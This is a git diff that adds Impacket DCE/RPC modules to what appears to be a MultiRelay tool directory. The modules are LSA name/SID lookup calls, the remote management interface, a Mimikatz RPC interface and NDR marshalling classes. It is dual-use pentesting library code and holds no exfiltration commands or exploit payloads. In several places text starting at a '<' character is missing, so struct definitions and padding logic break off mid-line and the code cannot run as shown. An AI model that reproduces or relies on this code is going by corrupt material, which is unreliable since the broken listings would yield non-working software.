('MappedCount', ULONG), + ('LookupOptions', ULONG), + ('ClientRevision', ULONG), + ) + +class LsarLookupNames2Response(NDRCALL): + structure = ( + ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST), + ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX), + ('MappedCount', ULONG), + ('ErrorCode', NTSTATUS), + ) + +# 3.1.4.8 LsarLookupNames (Opnum 14) +class LsarLookupNames(NDRCALL): + opnum = 14 + structure = ( + ('PolicyHandle', LSAPR_HANDLE), + ('Count', ULONG), + ('Names', RPC_UNICODE_STRING_ARRAY), + ('TranslatedSids', LSAPR_TRANSLATED_SIDS), + ('LookupLevel', LSAP_LOOKUP_LEVEL), + ('MappedCount', ULONG), + ) + +class LsarLookupNamesResponse(NDRCALL): + structure = ( + ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST), + ('TranslatedSids', LSAPR_TRANSLATED_SIDS), + ('MappedCount', ULONG), + ('ErrorCode', NTSTATUS), + ) + +# 3.1.4.9 LsarLookupSids3 (Opnum 76) +class LsarLookupSids3(NDRCALL): + opnum = 76 + structure = ( + ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER), + ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX), + ('LookupLevel', LSAP_LOOKUP_LEVEL), + ('MappedCount', ULONG), + ('LookupOptions', ULONG), + ('ClientRevision', ULONG), + ) + +class LsarLookupSids3Response(NDRCALL): + structure = ( + ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST), + ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX), + ('MappedCount', ULONG), + ('ErrorCode', NTSTATUS), + ) + +# 3.1.4.10 LsarLookupSids2 (Opnum 57) +class LsarLookupSids2(NDRCALL): + opnum = 57 + structure = ( + ('PolicyHandle', LSAPR_HANDLE), + ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER), + ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX), + ('LookupLevel', LSAP_LOOKUP_LEVEL), + ('MappedCount', ULONG), + ('LookupOptions', ULONG), + ('ClientRevision', ULONG), + ) + +class LsarLookupSids2Response(NDRCALL): + structure = ( + ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST), + ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX), + ('MappedCount', ULONG), + ('ErrorCode', NTSTATUS), + ) + +# 3.1.4.11 LsarLookupSids (Opnum 15) +class LsarLookupSids(NDRCALL): + opnum = 15 + structure = ( + ('PolicyHandle', LSAPR_HANDLE), + ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER), + ('TranslatedNames', LSAPR_TRANSLATED_NAMES), + ('LookupLevel', LSAP_LOOKUP_LEVEL), + ('MappedCount', ULONG), + ) + +class LsarLookupSidsResponse(NDRCALL): + structure = ( + ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST), + ('TranslatedNames', LSAPR_TRANSLATED_NAMES), + ('MappedCount', ULONG), + ('ErrorCode', NTSTATUS), + ) + +################################################################################ +# OPNUMs and their corresponding structures +################################################################################ +OPNUMS = { + 14 : (LsarLookupNames, LsarLookupNamesResponse), + 15 : (LsarLookupSids, LsarLookupSidsResponse), + 45 : (LsarGetUserName, LsarGetUserNameResponse), + 57 : (LsarLookupSids2, LsarLookupSids2Response), + 58 : (LsarLookupNames2, LsarLookupNames2Response), + 68 : (LsarLookupNames3, LsarLookupNames3Response), + 76 : (LsarLookupSids3, LsarLookupSids3Response), + 77 : (LsarLookupNames4, LsarLookupNames4Response), +} + +################################################################################ +# HELPER FUNCTIONS +################################################################################ +def hLsarGetUserName(dce, userName = NULL, domainName = NULL): + request = LsarGetUserName() + request['SystemName'] = NULL + request['UserName'] = userName + request['DomainName'] = domainName + return dce.request(request) + +def hLsarLookupNames4(dce, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001): + request = LsarLookupNames4() + request['Count'] = len(names) + for name in names: + itemn = RPC_UNICODE_STRING() + itemn['Data'] = name + request['Names'].append(itemn) + request['TranslatedSids']['Sids'] = NULL + request['LookupLevel'] = lookupLevel + request['LookupOptions'] = lookupOptions + request['ClientRevision'] = clientRevision + + return dce.request(request) + +def hLsarLookupNames3(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001): + request = LsarLookupNames3() + request['PolicyHandle'] = policyHandle + request['Count'] = len(names) + for name in names: + itemn = RPC_UNICODE_STRING() + itemn['Data'] = name + request['Names'].append(itemn) + request['TranslatedSids']['Sids'] = NULL + request['LookupLevel'] = lookupLevel + request['LookupOptions'] = lookupOptions + request['ClientRevision'] = clientRevision + + return dce.request(request) + +def hLsarLookupNames2(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001): + request = LsarLookupNames2() + request['PolicyHandle'] = policyHandle + request['Count'] = len(names) + for name in names: + itemn = RPC_UNICODE_STRING() + itemn['Data'] = name + request['Names'].append(itemn) + request['TranslatedSids']['Sids'] = NULL + request['LookupLevel'] = lookupLevel + request['LookupOptions'] = lookupOptions + request['ClientRevision'] = clientRevision + + return dce.request(request) + +def hLsarLookupNames(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta): + request = LsarLookupNames() + request['PolicyHandle'] = policyHandle + request['Count'] = len(names) + for name in names: + itemn = RPC_UNICODE_STRING() + itemn['Data'] = name + request['Names'].append(itemn) + request['TranslatedSids']['Sids'] = NULL + request['LookupLevel'] = lookupLevel + + return dce.request(request) + +def hLsarLookupSids2(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001): + request = LsarLookupSids2() + request['PolicyHandle'] = policyHandle + request['SidEnumBuffer']['Entries'] = len(sids) + for sid in sids: + itemn = LSAPR_SID_INFORMATION() + itemn['Sid'].fromCanonical(sid) + request['SidEnumBuffer']['SidInfo'].append(itemn) + + request['TranslatedNames']['Names'] = NULL + request['LookupLevel'] = lookupLevel + request['LookupOptions'] = lookupOptions + request['ClientRevision'] = clientRevision + + return dce.request(request) + +def hLsarLookupSids(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta): + request = LsarLookupSids() + request['PolicyHandle'] = policyHandle + request['SidEnumBuffer']['Entries'] = len(sids) + for sid in sids: + itemn = LSAPR_SID_INFORMATION() + itemn['Sid'].fromCanonical(sid) + request['SidEnumBuffer']['SidInfo'].append(itemn) + + request['TranslatedNames']['Names'] = NULL + request['LookupLevel'] = lookupLevel + + return dce.request(request) diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mgmt.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mgmt.py new file mode 100644 index 0000000..b419c11 --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mgmt.py @@ -0,0 +1,166 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# [C706] Remote Management Interface implementation +# +# Best way to learn how to use these calls is to grab the protocol standard +# so you understand what the call does, and then read the test case located +# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC +# +# Some calls have helper functions, which makes it even easier to use. +# They are located at the end of this file. +# Helper functions start with "h". +# There are test cases for them too. +# +from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRUniConformantVaryingArray +from impacket.dcerpc.v5.epm import PRPC_IF_ID +from impacket.dcerpc.v5.dtypes import ULONG, DWORD_ARRAY, ULONGLONG +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket.uuid import uuidtup_to_bin +from impacket import nt_errors + +MSRPC_UUID_MGMT = uuidtup_to_bin(('afa8bd80-7d8a-11c9-bef4-08002b102989','1.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + key = self.error_code + if key in nt_errors.ERROR_MESSAGES: + error_msg_short = nt_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] + return 'MGMT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'MGMT SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ + +class rpc_if_id_p_t_array(NDRUniConformantArray): + item = PRPC_IF_ID + +class rpc_if_id_vector_t(NDRSTRUCT): + structure = ( + ('count',ULONG), + ('if_id',rpc_if_id_p_t_array), + ) + structure64 = ( + ('count',ULONGLONG), + ('if_id',rpc_if_id_p_t_array), + ) + +class rpc_if_id_vector_p_t(NDRPOINTER): + referent = ( + ('Data', rpc_if_id_vector_t), + ) + +error_status = ULONG +################################################################################ +# STRUCTURES +################################################################################ + +################################################################################ +# RPC CALLS +################################################################################ +class inq_if_ids(NDRCALL): + opnum = 0 + structure = ( + ) + +class inq_if_idsResponse(NDRCALL): + structure = ( + ('if_id_vector', rpc_if_id_vector_p_t), + ('status', error_status), + ) + +class inq_stats(NDRCALL): + opnum = 1 + structure = ( + ('count', ULONG), + ) + +class inq_statsResponse(NDRCALL): + structure = ( + ('count', ULONG), + ('statistics', DWORD_ARRAY), + ('status', error_status), + ) + +class is_server_listening(NDRCALL): + opnum = 2 + structure = ( + ) + +class is_server_listeningResponse(NDRCALL): + structure = ( + ('status', error_status), + ) + +class stop_server_listening(NDRCALL): + opnum = 3 + structure = ( + ) + +class stop_server_listeningResponse(NDRCALL): + structure = ( + ('status', error_status), + ) + +class inq_princ_name(NDRCALL): + opnum = 4 + structure = ( + ('authn_proto', ULONG), + ('princ_name_size', ULONG), + ) + +class inq_princ_nameResponse(NDRCALL): + structure = ( + ('princ_name', NDRUniConformantVaryingArray), + ('status', error_status), + ) + + +################################################################################ +# OPNUMs and their corresponding structures +################################################################################ +OPNUMS = { + 0 : (inq_if_ids, inq_if_idsResponse), + 1 : (inq_stats, inq_statsResponse), + 2 : (is_server_listening, is_server_listeningResponse), + 3 : (stop_server_listening, stop_server_listeningResponse), + 4 : (inq_princ_name, inq_princ_nameResponse), +} + +################################################################################ +# HELPER FUNCTIONS +################################################################################ +def hinq_if_ids(dce): + request = inq_if_ids() + return dce.request(request) + +def hinq_stats(dce, count = 4): + request = inq_stats() + request['count'] = count + return dce.request(request) + +def his_server_listening(dce): + request = is_server_listening() + return dce.request(request, checkError=False) + +def hstop_server_listening(dce): + request = stop_server_listening() + return dce.request(request) + +def hinq_princ_name(dce, authn_proto=0, princ_name_size=1): + request = inq_princ_name() + request['authn_proto'] = authn_proto + request['princ_name_size'] = princ_name_size + return dce.request(request, checkError=False) diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mimilib.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mimilib.py new file mode 100644 index 0000000..fdcdb8b --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mimilib.py @@ -0,0 +1,236 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# Mimikatz Interface implementation, based on @gentilkiwi IDL +# +# Best way to learn how to use these calls is to grab the protocol standard +# so you understand what the call does, and then read the test case located +# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC +# +# Some calls have helper functions, which makes it even easier to use. +# They are located at the end of this file. +# Helper functions start with "h". +# There are test cases for them too. +# +from __future__ import division +from __future__ import print_function +import binascii +import random + +from impacket import nt_errors +from impacket.dcerpc.v5.dtypes import DWORD, ULONG +from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket.uuid import uuidtup_to_bin +from impacket.structure import Structure + +MSRPC_UUID_MIMIKATZ = uuidtup_to_bin(('17FC11E9-C258-4B8D-8D07-2F4125156244', '1.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + key = self.error_code + if key in nt_errors.ERROR_MESSAGES: + error_msg_short = nt_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] + return 'Mimikatz SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'Mimikatz SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ +CALG_DH_EPHEM = 0x0000aa02 +TPUBLICKEYBLOB = 0x6 +CUR_BLOB_VERSION = 0x2 +ALG_ID = DWORD +CALG_RC4 = 0x6801 + +################################################################################ +# STRUCTURES +################################################################################ +class PUBLICKEYSTRUC(Structure): + structure = ( + ('bType','B=0'), + ('bVersion','B=0'), + ('reserved',' 0: + pad = (alignment - (soFar % alignment)) % alignment + else: + pad = 0 + + return pad + + def getData(self, soFar = 0): + data = b'' + for fieldName, fieldTypeOrClass in self.commonHdr+self.structure: + try: + # Alignment of Primitive Types + + # NDR enforces NDR alignment of primitive data; that is, any primitive of size n + # octets is aligned at a octet stream index that is a multiple of n. + # (In this version of NDR, n is one of {1, 2, 4, 8}.) An octet stream index indicates + # the number of an octet in an octet stream when octets are numbered, beginning with 0, + # from the first octet in the stream. Where necessary, an alignment gap, consisting of + # octets of unspecified value, precedes the representation of a primitive. The gap is + # of the smallest size sufficient to align the primitive. + pad = self.calculatePad(fieldTypeOrClass, soFar) + if pad > 0: + soFar += pad + data += b'\xbf'*pad + + res = self.pack(fieldName, fieldTypeOrClass, soFar) + + data += res + soFar += len(res) + except Exception as e: + LOG.error(str(e)) + LOG.error("Error packing field '%s | %s' in %s" % (fieldName, fieldTypeOrClass, self.__class__)) + raise + + return data + + def fromString(self, data, offset=0): + offset0 = offset + for fieldName, fieldTypeOrClass in self.commonHdr+self.structure: + try: + # Alignment of Primitive Types + + # NDR enforces NDR alignment of primitive data; that is, any primitive of size n + # octets is aligned at a octet stream index that is a multiple of n. + # (In this version of NDR, n is one of {1, 2, 4, 8}.) An octet stream index indicates + # the number of an octet in an octet stream when octets are numbered, beginning with 0, + # from the first octet in the stream. Where necessary, an alignment gap, consisting of + # octets of unspecified value, precedes the representation of a primitive. The gap is + # of the smallest size sufficient to align the primitive. + offset += self.calculatePad(fieldTypeOrClass, offset) + + offset += self.unpack(fieldName, fieldTypeOrClass, data, offset) + except Exception as e: + LOG.error(str(e)) + LOG.error("Error unpacking field '%s | %s | %r'" % (fieldName, fieldTypeOrClass, data[offset:offset+256])) + raise + return offset - offset0 + + def pack(self, fieldName, fieldTypeOrClass, soFar = 0): + if isinstance(self.fields[fieldName], NDR): + return self.fields[fieldName].getData(soFar) + + data = self.fields[fieldName] + # void specifier + if fieldTypeOrClass[:1] == '_': + return b'' + + # code specifier + two = fieldTypeOrClass.split('=') + if len(two) >= 2: + try: + return self.pack(fieldName, two[0], soFar) + except: + self.fields[fieldName] = eval(two[1], {}, self.fields) + return self.pack(fieldName, two[0], soFar) + + if data is None: + raise Exception('Trying to pack None') + + # literal specifier + if fieldTypeOrClass[:1] == ':': + if hasattr(data, 'getData'): + return data.getData() + return data + + # struct like specifier + return pack(fieldTypeOrClass, data) + + def unpack(self, fieldName, fieldTypeOrClass, data, offset=0): + if isinstance(self.fields[fieldName], NDR): + return self.fields[fieldName].fromString(data, offset) + + # code specifier + two = fieldTypeOrClass.split('=') + if len(two) >= 2: + return self.unpack(fieldName, two[0], data, offset) + + # literal specifier + if fieldTypeOrClass == ':': + if isinstance(fieldTypeOrClass, NDR): + return self.fields[fieldName].fromString(data, offset) + else: + dataLen = self.getDataLen(data, offset) + self.fields[fieldName] = data[offset:offset+dataLen] + return dataLen + + # struct like specifier + self.fields[fieldName] = unpack_from(fieldTypeOrClass, data, offset)[0] + + return calcsize(fieldTypeOrClass) + + def calcPackSize(self, fieldTypeOrClass, data): + if isinstance(fieldTypeOrClass, str) is False: + return len(data) + + # code specifier + two = fieldTypeOrClass.split('=') + if len(two) >= 2: + return self.calcPackSize(two[0], data) + + # literal specifier + if fieldTypeOrClass[:1] == ':': + return len(data) + + # struct like specifier + return calcsize(fieldTypeOrClass) + + def calcUnPackSize(self, fieldTypeOrClass, data, offset=0): + if isinstance(fieldTypeOrClass, str) is False: + return len(data) - offset + + # code specifier + two = fieldTypeOrClass.split('=') + if len(two) >= 2: + return self.calcUnPackSize(two[0], data, offset) + + # array specifier + two = fieldTypeOrClass.split('*') + if len(two) == 2: + return len(data) - offset + + # literal specifier + if fieldTypeOrClass[:1] == ':': + return len(data) - offset + + # struct like specifier + return calcsize(fieldTypeOrClass) + +# NDR Primitives +class NDRSMALL(NDR): + align = 1 + structure = ( + ('Data', 'b=0'), + ) + +class NDRUSMALL(NDR): + align = 1 + structure = ( + ('Data', 'B=0'), + ) + +class NDRBOOLEAN(NDRSMALL): + def dump(self, msg = None, indent = 0): + if msg is None: + msg = self.__class__.__name__ + if msg != '': + print(msg, end=' ') + + if self['Data'] > 0: + print(" TRUE") + else: + print(" FALSE") + +class NDRCHAR(NDR): + align = 1 + structure = ( + ('Data', 'c'), + ) + +class NDRSHORT(NDR): + align = 2 + structure = ( + ('Data', ' 0: + soFar += pad0 + arrayPadding = b'\xef'*pad0 + else: + arrayPadding = b'' + # And now, let's pretend we put the item in + soFar += arrayItemSize + data = self.fields[fieldName].getData(soFar) + data = arrayPadding + pack(arrayPackStr, self.getArrayMaximumSize(fieldName)) + data + else: + pad = self.calculatePad(fieldTypeOrClass, soFar) + if pad > 0: + soFar += pad + data += b'\xcc'*pad + + data += self.pack(fieldName, fieldTypeOrClass, soFar) + + # Any referent information to pack? + if isinstance(self.fields[fieldName], NDRCONSTRUCTEDTYPE): + data += self.fields[fieldName].getDataReferents(soFar0 + len(data)) + data += self.fields[fieldName].getDataReferent(soFar0 + len(data)) + soFar = soFar0 + len(data) + + except Exception as e: + LOG.error(str(e)) + LOG.error("Error packing field '%s | %s' in %s" % (fieldName, fieldTypeOrClass, self.__class__)) + raise + + return data + + def calcPackSize(self, fieldTypeOrClass, data): + if isinstance(fieldTypeOrClass, str) is False: + return len(data) + + # array specifier + two = fieldTypeOrClass.split('*') + if len(two) == 2: + answer = 0 + for each in data: + if self.isNDR(self.item): + item = ':' + else: + item = self.item + answer += self.calcPackSize(item, each) + return answer + else: + return NDR.calcPackSize(self, fieldTypeOrClass, data) + + def getArrayMaximumSize(self, fieldName): + if self.fields[fieldName].fields['MaximumCount'] is not None and self.fields[fieldName].fields['MaximumCount'] > 0: + return self.fields[fieldName].fields['MaximumCount'] + else: + return self.fields[fieldName].getArraySize() + + def getArraySize(self, fieldName, data, offset=0): + if self._isNDR64: + arrayItemSize = 8 + arrayUnPackStr = ' align: + align = tmpAlign + return align + + def getData(self, soFar = 0): + data = b'' + soFar0 = soFar + for fieldName, fieldTypeOrClass in self.structure: + try: + if self.isNDR(fieldTypeOrClass) is False: + # If the item is not NDR (e.g. ('MaximumCount', ' 0: + soFar += pad + data += b'\xca'*pad + + res = self.pack(fieldName, fieldTypeOrClass, soFar) + data += res + soFar = soFar0 + len(data) + except Exception as e: + LOG.error(str(e)) + LOG.error("Error packing field '%s | %s' in %s" % (fieldName, fieldTypeOrClass, self.__class__)) + raise + + return data + + def pack(self, fieldName, fieldTypeOrClass, soFar = 0): + # array specifier + two = fieldTypeOrClass.split('*') + if len(two) == 2: + answer = b'' + if self.isNDR(self.item): + item = ':' + dataClass = self.item + self.fields['_tmpItem'] = dataClass(isNDR64=self._isNDR64) + else: + item = self.item + dataClass = None + self.fields['_tmpItem'] = item + + for each in (self.fields[fieldName]): + pad = self.calculatePad(self.item, len(answer)+soFar) + if pad > 0: + answer += b'\xdd' * pad + if dataClass is None: + if item == 'c' and PY3 and isinstance(each, int): + # Special case when dealing with PY3, here we have an integer we need to convert + each = bytes([each]) + answer += pack(item, each) + else: + answer += each.getData(len(answer)+soFar) + + if dataClass is not None: + for each in self.fields[fieldName]: + if isinstance(each, NDRCONSTRUCTEDTYPE): + answer += each.getDataReferents(len(answer)+soFar) + answer += each.getDataReferent(len(answer)+soFar) + + del(self.fields['_tmpItem']) + if isinstance(self, NDRUniConformantArray) or isinstance(self, NDRUniConformantVaryingArray): + # First field points to a field with the amount of items + self.setArraySize(len(self.fields[fieldName])) + else: + self.fields[two[1]] = len(self.fields[fieldName]) + + return answer + else: + return NDRCONSTRUCTEDTYPE.pack(self, fieldName, fieldTypeOrClass, soFar) + + def fromString(self, data, offset=0): + offset0 = offset + for fieldName, fieldTypeOrClass in self.commonHdr+self.structure: + try: + if self.isNDR(fieldTypeOrClass) is False: + # If the item is not NDR (e.g. ('MaximumCount', ' 0: + soFarItems +=pad + if dataClassOrCode is None: + nsofar = soFarItems + calcsize(item) + answer.append(unpack_from(item, data, offset+soFarItems)[0]) + else: + itemn = dataClassOrCode(isNDR64=self._isNDR64) + size = itemn.fromString(data, offset+soFarItems) + answer.append(itemn) + nsofar += size + pad + numItems -= 1 + soFarItems = nsofar + + if dataClassOrCode is not None and isinstance(dataClassOrCode(), NDRCONSTRUCTEDTYPE): + # We gotta go over again, asking for the referents + answer2 = [] + for itemn in answer: + size = itemn.fromStringReferents(data, soFarItems+offset) + soFarItems += size + size = itemn.fromStringReferent(data, soFarItems+offset) + soFarItems += size + answer2.append(itemn) + answer = answer2 + del answer2 + + del(self.fields['_tmpItem']) + + self.fields[fieldName] = answer + return soFarItems + offset - offset0 + else: + return NDRCONSTRUCTEDTYPE.unpack(self, fieldName, fieldTypeOrClass, data, offset) + +class NDRUniFixedArray(NDRArray): + structure = ( + ('Data',':'), + ) + +# Uni-dimensional Conformant Arrays +class NDRUniConformantArray(NDRArray): + item = 'c' + structure = ( + #('MaximumCount', '